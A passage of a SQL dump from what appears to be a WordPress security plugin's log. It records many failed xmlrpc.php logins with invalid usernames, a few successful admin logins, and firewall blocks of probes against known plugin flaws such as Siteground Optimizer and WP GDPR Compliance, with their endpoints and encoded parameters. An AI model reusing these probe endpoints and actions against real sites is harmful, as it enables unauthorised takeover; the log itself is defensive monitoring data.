Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8376,0.000000,1566372490.277618,'\0\0\0\0\0\0\0\0\0\0/y',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8377,0.000000,1566373645.471003,'\0\0\0\0\0\0\0\0\0\0gJ{',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8378,0.000000,1566379476.191987,'\0\0\0\0\0\0\0\0\0\0>',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8379,0.000000,1566380648.467296,'\0\0\0\0\0\0\0\0\0\0k',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8380,0.000000,1566384253.724961,'\0\0\0\0\0\0\0\0\0\0@',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8381,0.000000,1566385486.153111,'\0\0\0\0\0\0\0\0\0\04--',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8382,0.000000,1566386717.001844,'\0\0\0\0\0\0\0\0\0\0>-\'',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8383,0.000000,1566389165.977023,'\0\0\0\0\0\0\0\0\0\0k',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8384,0.000000,1566390430.202275,'\0\0\0\0\0\0\0\0\0\0~',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8385,0.000000,1566391677.509488,'\0\0\0\0\0\0\0\0\0\0ҭ',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8386,0.000000,1566394975.298813,'\0\0\0\0\0\0\0\0\0\0\"繬',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8387,0.000000,1566396957.635865,'\0\0\0\0\0\0\0\0\0\0>c]',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8388,0.000000,1566399031.030862,'\0\0\0\0\0\0\0\0\0\0	B',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8389,0.000000,1566400113.466291,'\0\0\0\0\0\0\0\0\0\0k',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8390,0.000000,1566401096.299116,'\0\0\0\0\0\0\0\0\0\0q',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8391,0.000000,1566403285.129576,'\0\0\0\0\0\0\0\0\0\0g',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8392,0.000000,1566404273.670053,'\0\0\0\0\0\0\0\0\0\0c',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8393,0.000000,1566405314.024719,'\0\0\0\0\0\0\0\0\0\0\"',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8394,0.000000,1566406429.562380,'\0\0\0\0\0\0\0\0\0\0kR',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8395,0.000000,1566408553.454976,'\0\0\0\0\0\0\0\0\0\0/K',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8396,0.000000,1566410684.382823,'\0\0\0\0\0\0\0\0\0\0>L',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8397,0.000000,1566411875.843147,'\0\0\0\0\0\0\0\0\0\04N2C',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8398,0.000000,1566415109.342424,'\0\0\0\0\0\0\0\0\0\0\ra',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8399,0.000000,1566417286.433856,'\0\0\0\0\0\0\0\0\0\0D',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8400,0.000000,1566418431.081596,'\0\0\0\0\0\0\0\0\0\0.+',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8401,0.000000,1566419562.406428,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8402,0.000000,1566422935.723418,'\0\0\0\0\0\0\0\0\0\0>L',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8403,0.000000,1566425305.248282,'\0\0\0\0\0\0\0\0\0\0/K',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8404,0.000000,1566426340.097616,'\0\0\0\0\0\0\0\0\0\0&V',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8405,0.000000,1566429487.693275,'\0\0\0\0\0\0\0\0\0\0gMjB',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8406,0.000000,1566430593.199917,'\0\0\0\0\0\0\0\0\0\0hk7',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8407,0.000000,1566432980.216643,'\0\0\0\0\0\0\0\0\0\0>sf',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8408,0.000000,1566434090.846035,'\0\0\0\0\0\0\0\0\0\0E\0',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8409,0.000000,1566437611.684175,'\0\0\0\0\0\0\0\0\0\0f',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8410,0.000000,1566438759.364951,'\0\0\0\0\0\0\0\0\0\0D9',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8411,0.000000,1566442349.378671,'\0\0\0\0\0\0\0\0\0\0E\0',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8412,0.000000,1566443363.080965,'\0\0\0\0\0\0\0\0\0\0l=F',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8413,0.000000,1566445919.757385,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8414,0.000000,1566448224.735521,'\0\0\0\0\0\0\0\0\0\0Ac&',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8415,0.000000,1566450589.423199,'\0\0\0\0\0\0\0\0\0\0C',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8416,0.000000,1566451756.943213,'\0\0\0\0\0\0\0\0\0\04',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8417,0.000000,1566452978.545368,'\0\0\0\0\0\0\0\0\0\0։',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8418,0.000000,1566457666.006996,'\0\0\0\0\0\0\0\0\0\0g',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8419,0.000000,1566458864.971392,'\0\0\0\0\0\0\0\0\0\0D',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8420,0.000000,1566460081.224260,'\0\0\0\0\0\0\0\0\0\0>iJ',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8421,0.000000,1566462479.715985,'\0\0\0\0\0\0\0\0\0\0>$',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8422,0.000000,1566463590.794733,'\0\0\0\0\0\0\0\0\0\0P',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8423,0.000000,1566463819.965846,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailInvalidUsername',NULL,NULL),(8424,0.000000,1566463832.129397,'\0\0\0\0\0\0\0\0\0\0',0,302,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginOK',NULL,NULL),(8425,0.000000,1566467240.313181,'\0\0\0\0\0\0\0\0\0\0gc',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8426,0.000000,1566468506.974567,'\0\0\0\0\0\0\0\0\0\0/y',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8427,0.000000,1566469757.463882,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8428,0.000000,1566472246.705717,'\0\0\0\0\0\0\0\0\0\0>t;',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8429,0.000000,1566473453.854741,'\0\0\0\0\0\0\0\0\0\0ӫ',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8430,0.000000,1566474650.405198,'\0\0\0\0\0\0\0\0\0\0C',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8431,0.000000,1566474936.787042,'\0\0\0\0\0\0\0\0\0\0',0,302,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2Fupdate-core.php%3Faction%3Ddo-plugin-upgrade&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginOK',NULL,NULL),(8432,0.000000,1566475983.362810,'\0\0\0\0\0\0\0\0\0\0ӫ',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8433,0.000000,1566478910.169759,'\0\0\0\0\0\0\0\0\0\0',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36','loginOK',NULL,NULL),(8434,0.000000,1566479755.571690,'\0\0\0\0\0\0\0\0\0\0kR',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8435,0.000000,1566480974.031303,'\0\0\0\0\0\0\0\0\0\0^',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8436,0.000000,1566482287.005926,'\0\0\0\0\0\0\0\0\0\0gi<',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8437,0.000000,1566482586.663796,'\0\0\0\0\0\0\0\0\0\0',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36','loginOK',NULL,NULL),(8438,0.000000,1566484751.241726,'\0\0\0\0\0\0\0\0\0\0B',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8439,0.000000,1566485962.462824,'\0\0\0\0\0\0\0\0\0\0g',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8440,0.000000,1566486831.203825,'\0\0\0\0\0\0\0\0\0\0H',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8441,0.000000,1566487801.291590,'\0\0\0\0\0\0\0\0\0\0C7v',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8442,0.000000,1566489835.256377,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8443,0.000000,1566490823.870945,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8444,0.000000,1566491885.004604,'\0\0\0\0\0\0\0\0\0\0m{',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8445,0.000000,1566492885.102266,'\0\0\0\0\0\0\0\0\0\0@Z(',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8446,0.000000,1566496044.589452,'\0\0\0\0\0\0\0\0\0\0',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8447,0.000000,1566497184.141146,'\0\0\0\0\0\0\0\0\0\0>iJ',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1','loginFailInvalidUsername',NULL,NULL),(8448,0.000000,1566499234.204960,'\0\0\0\0\0\0\0\0\0\0g<',0,200,0,0,0,'https://mail.companyregistration.online/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(8449,0.000000,1566647513.788273,'\0\0\0\0\0\0\0\0\0\0',0,200,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2Fpost.php%3Faction%3Dedit%26post%3D33134&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginOK',NULL,NULL),(8450,0.000000,1566647536.465607,'\0\0\0\0\0\0\0\0\0\0',1,200,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginOK',NULL,NULL),(8451,0.000000,1566740222.631719,'\0\0\0\0\0\0\0\0\0\0fy',0,302,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2Fupdate-core.php&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginOK',NULL,NULL),(8452,1566745834.459113,1566745834.135500,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'http://companyregistration.online/wp-json/siteground-optimizer/v1/enable-option',NULL,'Go-http-client/1.1','blocked:waf','Siteground Optimizer <= 5.0.12 - Improper REST capabilities checks','{\"learningMode\":0,\"failedRules\":\"134\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"path\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"category\":\"auth-bypass\",\"ssl\":0}'),(8453,1566745833.432488,1566745833.070200,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(8470,1566862062.617685,1566862061.954600,'\0\0\0\0\0\0\0\0\0\0Gܲ',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":0}'),(8454,1566745832.261195,1566745831.808500,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Kiwi Social Share <= 2.0.10 - Unauthenticated Update Any Option','{\"learningMode\":0,\"failedRules\":\"122\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8455,1566745830.918031,1566745830.028700,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8486,1566895595.497131,1566895594.992300,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8456,1566745855.591895,1566745855.096300,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php?action=cp_add_subscriber',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WAF-RULE-149','{\"learningMode\":0,\"failedRules\":\"149\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvZGlnaXQ2MjYvY29tcGFueXJlZ2lzdHJhdGlvbi5vbmxpbmUvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(8483,1566895598.439641,1566895597.948200,'\0\0\0\0\0\0\0\0\0\0_',0,403,0,0,0,'http://companyregistration.online/wp-json/siteground-optimizer/v1/enable-option',NULL,'Go-http-client/1.1','blocked:waf','Siteground Optimizer <= 5.0.12 - Improper REST capabilities checks','{\"learningMode\":0,\"failedRules\":\"134\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"path\":\"L3dwLWpzb24vc2l0ZWdyb3VuZC1vcHRpbWl6ZXIvdjEvZW5hYmxlLW9wdGlvbg==\",\"category\":\"auth-bypass\",\"ssl\":0}'),(8457,1566745854.251216,1566745853.782900,'\0\0\0\0\0\0\0\0\0\0(',0,403,0,0,0,'http://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 